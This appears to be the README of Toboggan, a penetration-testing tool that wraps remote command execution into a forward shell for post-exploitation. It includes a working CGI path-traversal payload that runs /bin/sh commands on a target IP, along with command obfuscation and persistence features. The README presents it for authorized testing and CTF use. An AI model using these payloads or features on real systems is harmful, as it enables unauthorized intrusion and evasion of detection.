π Slide into post-exploitation from RCE with ease. Toboggan wraps your remote command execution into a upgradable dumb shell, sliding directly into post-exploitation phase. It allows you to fastly launch a mkfifo forward-shell inside a targeted Linux environment.
Installing Toboggan is simple. You can install it directly from the repository:
pip install 'toboggan@git+https://github.com/n3rada/toboggan.git'Using pipx
Be careful, it installs Python applications in isolated virtual environments, which means they do not have access to system-wide packages by default (like psycopg2).
pipx install 'git+https://github.com/n3rada/toboggan.git'If you want-it to use system site packages, pass --system-site-packages when installing via pipx:
pipx install --system-site-packages 'git+https://github.com/n3rada/toboggan.git'Once installed, you can execute it using:
toboggan -m ~/phpexploit.pyWhen you are knowing what you are doing, you can also do:
toboggan -m ~/phpexploit.py --camouflage --fifo --os "linux" -wd /dev/shm/apache-tmpIt will start a FiFo named-pipe (a.k.a mkfifo shell, forward-shell) on linux (--os) remote system and obfuscating all commands (--camouflage) using the hide.py actions.
If you are really lazy, you can directly wrap a shell command:
toboggan --exec-wrapper 'curl -s --path-as-is -d "echo Content-Type: text/plain; echo; ||cmd||" "http://192.168.216.188/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh"'You can forward to your favorite proxifier such as your favorite Squid server using the --proxy parameter:
toboggan -m ~/phpexploit.py --proxy http://squideu.<something>.io:3128To route traffic through Burp Suite:
toboggan -m ~/phpexploit.py --proxyYou can also directly import a Burp saved request that contains the ||cmd|| placeholder:
toboggan -r brequestA Remote Code Execution (RCE) module is a Python script that defines how commands are sent to and executed on a remote system. Toboggan uses this module to wrap and streamline post-exploitation command execution.
To be compatible with Toboggan, your module must define a function with the following exact signature:
def execute(command: str, timeout: float) -> str:
"""
Execute a command remotely and return the output.
Args:
command (str): The command to execute.
timeout (float): Execution timeout.
Returns:
str: The command output.
"""This function will be called internally by Toboggan to execute commands remotely. It uses modwrap under the hood.
Your execute() function must handle all quirks of the target system.
- If space characters need to be replaced (e.g., with
${IFS}), handle that inside the function. - If special encoding is required (e.g., base64, hex), apply it before sending.
- If the system echoes extra characters or wraps the output, sanitize it.
- If the remote interface is slow or unreliable, tune the timeout.
The goal is for Toboggan to call your execute() function with any arbitrary command and get the correct output, as if you typed it in a shell.
Toboggan uses named pipes (FIFO - First In, First Out) for inter-process communication (IPC). Named pipes are particularly useful when working with RCE over limited channels like HTTP requests or restricted command execution interfaces. It uses a mkfifo command under the hood. Also known as forward-shell style.
This allows Toboggan to simulate pseudo-TTY behavior, even in restricted environments behind firewalls. To enable named pipe mode, use the --fifo flag:
toboggan -m ~/phpexploit.py --fifoToboggan will create a FIFO-based communication channel, allowing you to interact with the remote system in a more dynamic way (e.g., using sudo -l).
Actions in Toboggan are modular plugins that allow you to extend its functionality. Actions can automate common post-exploitation tasks, such as downloading files, executing scripts, or setting up persistent access. Custom actions should be placed in ~/.local/share/toboggan/actions (Linux) or %APPDATA%\toboggan\actions (Windows).
Toboggan is intended for use in legal penetration testing, Capture The Flag (CTF) competitions, or other authorized and ethical security assessments. Unauthorized use of this tool on systems you do not own or without proper authorization may be illegal. Please use "Toboggan" responsibly and in compliance with applicable laws and regulations.